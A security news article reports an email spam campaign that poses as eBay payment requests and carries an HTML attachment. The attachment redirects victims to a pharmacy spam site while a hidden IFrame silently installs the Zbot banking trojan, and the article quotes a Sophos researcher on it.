14 DAY TRIAL // A new email spam campaign spreads emails masquerading as payment requests coming from eBay. Users are lured into opening an attached HTML file which redirects them to a malware pushing website.
The rogue email messages have a subject of “Payment request from.” This is most likely a spelling mistake, the spammers probably intending to write “payment request form.” This is suggested by the fact that the attached HTML file is called form.html. There is no message contained in the body, but the “From” field is forged to appear as if the emails were sent from a [email protected] address.
“Of course it's a sneaky piece of social engineering on the behalf of the hackers. Many people would be tempted to open the attachment to find out what on earth the email is about. And opening the attachment (which Sophos detects as Troj/JSRedir-BV) redirects your web browser to a recently compromised webpage on a legitimate site infected with Mal/Iframe-Q,” Graham Cluley, senior technology consultant at Sophos, writes.
In fact there are two parts to this attack. First, a redirect takes users to a common Canadian Pharmacy spam site, tricking them into believing that nothing truly dangerous happened. However, in the background a rogue IFrame loads a malicious script from a third party website. This code has the purpose of silently downloading and executing a piece of malware onto the visitors' computers.
Such attacks are known as drive-by-downloads and this particular one is used to push a Zbot variant. Zbot, or ZeuS, is a computer trojan commonly used to steal online banking credentials and other financial information. It is the weapon of choice for fraudsters looking to siphon money out of the bank accounts of individuals, companies and organizations everywhere.
The practice of attaching malicious HTML files to emails has intensified lately. Just yesterday we reported about a very similar spam campaign that masqueraded as YouTube friend requests.
You can follow the editor on Twitter @lconstantin